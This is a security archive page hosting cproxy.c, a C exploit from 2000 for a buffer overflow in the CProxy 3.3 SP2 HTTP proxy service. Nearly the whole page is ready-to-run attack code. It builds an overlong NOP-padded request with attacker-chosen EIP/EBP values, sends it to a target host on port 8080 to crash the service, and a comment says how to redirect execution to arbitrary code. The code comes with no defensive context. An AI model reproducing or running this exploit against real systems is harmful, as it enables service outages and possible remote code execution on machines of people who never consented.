what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

cproxy.c

cproxy.c
Posted May 19, 2000
Authored by TDP | Site hack.co.za

Remote Denial of Service for CProxy v3.3 - Service Pack 2 for Windows NT.

tags | exploit, remote, denial of service
systems | windows
SHA-256 | 9ac11023436a234df248b583ff8d03b1479376974e945735da16e7d03204fcf6

cproxy.c

Change Mirror Download
/*
* Remote Denial of Service for CProxy v3.3 - Service Pack 2
*
* (C) |[TDP]| - HaCk-13 TeaM - 2000 <tdp@psynet.net>
*
*
* This program xploits an overflow vulnerability in CProxy 3.3 SP2
* HTTP Service (8080), causing server shutdown
*
* Greetings to all the other members and all my friends :)
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define BUFFERSIZE 247
#define NOP 0x90
// If you change this values you can change EIP and EBP values
// to redirect to a code that you want >;)
#define EIP 0x61616161
#define EBP 0x61616161

void usage(char *progname) {
fprintf(stderr,"Usage: %s <hostname> [eip] [ebp]\n",progname);
exit(1);
}

int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE], remotedos[1024];
unsigned long *long_ptr,eip=EIP, ebp=EBP;
int aux,sock;
struct sockaddr_in sin;
unsigned long ip;
struct hostent *he;

fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");

if (argc<2) usage(argv[0]);

if (argc>=3) eip+=atol(argv[2]);

if (argc>=4) ebp+=atol(argv[3]);

ptr=buffer;
memset(ptr,0,sizeof(buffer));
memset(ptr,NOP,sizeof(buffer)-8);
ptr+=sizeof(buffer)-8;
long_ptr=(unsigned long*)ptr;
*(long_ptr++) = ebp;
*(long_ptr++) = eip;
ptr=(char *)long_ptr;
*ptr='\0';

bzero(remotedos, sizeof(remotedos));
snprintf(remotedos, sizeof(remotedos), "GET https://%s HTTP/1.0\r\n\r\n\r\n",buffer);

if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("socket()");
return -1;
}

if ((he = gethostbyname(argv[1])) != NULL) {
ip = *(unsigned long *)he->h_addr;
} else {
if ((ip = inet_addr(argv[1])) == NULL) {
perror("inet_addr()");
return -1;
}
}

sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip;
sin.sin_port = htons(8080);

fprintf(stderr,"\nEngaged...\n");
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect()");
return -1;
}

if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos)) {
perror("write()");
return -1;
}

fprintf(stderr,"Bye Bye baby!...\n\n");
if (close(sock) < 0) {
perror("close()");
return -1;
}
return(0);
}
/* www.hack.co.za [18 May]*/
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close